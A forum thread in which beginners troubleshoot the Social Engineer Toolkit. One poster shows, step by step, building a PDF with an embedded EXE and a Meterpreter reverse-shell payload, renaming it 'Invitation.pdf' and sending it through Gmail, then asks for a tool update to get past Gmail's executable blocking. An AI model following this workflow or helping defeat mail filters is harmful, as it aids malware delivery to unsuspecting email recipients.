Ruby error when using SET

[TaTaR]

Hello there,
I am complete begginer in using SET (Social Engineer Toolkit). And whatever i do i get error:

SMTP AUTH extension not supported by server.
global name 'base64' is not defined


SET has finished delivering the emails.

Do you want to setup a listener yes or no: yes
/usr/bin/ruby: No such file or directory -- /root/set/msfconsole (LoadError)

plz help.
Sory for english.

[relik]

Can you post all the options you were using to get to that? I'm not able to reproduce myself but may help to see what you were doing in order to identify the bug.

Thanks,

-ReL

[relik]

Actually, try svn updating and see if that fixed the issue, for some reason base64 wasn't being imported properly...

[vrillon]

Hi there relik,

I have a similar problem as the OP above. I have updated snv as you have guided above. It did not work, here is the exact process I went through on SET:

Code:

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8   Update the Metasploit Framework
9.  Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 1

Code:

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1

Code:

Select the file format exploit you want.
The default is the PDF embedded EXE.

        ********** PAYLOADS **********

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)

Enter the number you want (press enter for default): 8
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE
.

Code:

1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack

Enter your choice (return for default): 2

Code:

1. Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attac
ker.
2. Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to a
ttacker.
3. Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
.
4. Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterprete
r
6. Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote
 system.
7. Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meter
preter

Enter the payload you want (press enter for default): 2
Enter the port to connect back on (press enter for default): 5555[*] Generating fileformat exploit...[*] Payload creation complete.[*] All payloads get sent to the src/program_junk/template.pdf directory

Code:

As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 2
Enter the new filename: Invitation.pdf
Filename changed, moving on...

Code:

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Code:

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 2
Enter the subject of the email: Invitation

Code:

Do you want to send the message as html or plain?

1. HTML
2. Plain

Enter your choice (enter for plain): 2

Code:

Enter the body of the message, hit return for a new line.

Type your body and enter control+c when finished: Hello
Next line of the body: This is a test
Next line of the body: and i wonder if it will work
Next line of the body:
Next line of the body: regards
Next line of the body: me
Next line of the body: ^C

Code:

Enter who you want to send email to: me@hotmail.com

Code:

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1
Enter your GMAIL email address: me@gmail.com
Enter your password for gmail (it will not be displayed back to you):
(552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit http                                              ://mail.google.com/support/bin/answer.py?answer=6590 to\n5.7.0 review our attachment guidelines.                                               l51sm3636185wer.2')
(8, 'EOF occurred in violation of protocol')

It appears your password was incorrect.
Printing response: (8, 'EOF occurred in violation of protocol')
Press enter to continue.

Yet my password is correct. I even went onto my gmail account and changed it and tried the new password but it keeps failing. I think gmail has updated their security settings on allowing certain attachments. Do you think this S.E.T. method is now obsolete and that Google have patched this exploit?

Thanks relik,
Vrillon

PS: Incase you are wondering what exactly I am trying to achieve, it is a reconstruction of the YouTube video called "Social Engineering- Toolkit" (watch?v=9f2ANmI2-RI). This video appears to be old, old enough that the menu content is different and so far I think I am following the correct steps using the new menu.

Hopefully that can help any debugging process, would love to find out what is causing Gmail to refuse the attachment and stop complaining about it.

[vrillon]

It appears (with my error) that Gmail is treating my embedded PDF file as it would an EXE file.

Gmail Rules:

As a security measure to prevent potential viruses, Gmail doesn't allow you to send or receive executable files (such as files ending in .exe) that could contain damaging executable code. In addition, Gmail does not allow you to send or receive files that are corrupted.

Gmail won't accept these types of files even if they are sent in a zipped (.zip, .tar, .tgz, .taz, .z, .gz) format. If this type of message is sent to your Gmail address, it is bounced back to the sender automatically.

Other files that are denied:

"ade", "adp", "bat", "chm", "cmd", "com", "cpl", "dll", "exe",
"hta", "ins", "isp", "jse", "lib", "mde", "msc", "msp",
"mst", "pif", "scr", "sct", "shb", "sys", "vb", "vbe",
"vbs", "vxd", "wsc", "wsf", "wsh"

So, it seems to be that Gmail can detected the embedded EXE file within the PDF file now.

Is this method of the Social Engineering Toolkit now dead?

If so, relik; would you be able to update this in the next update?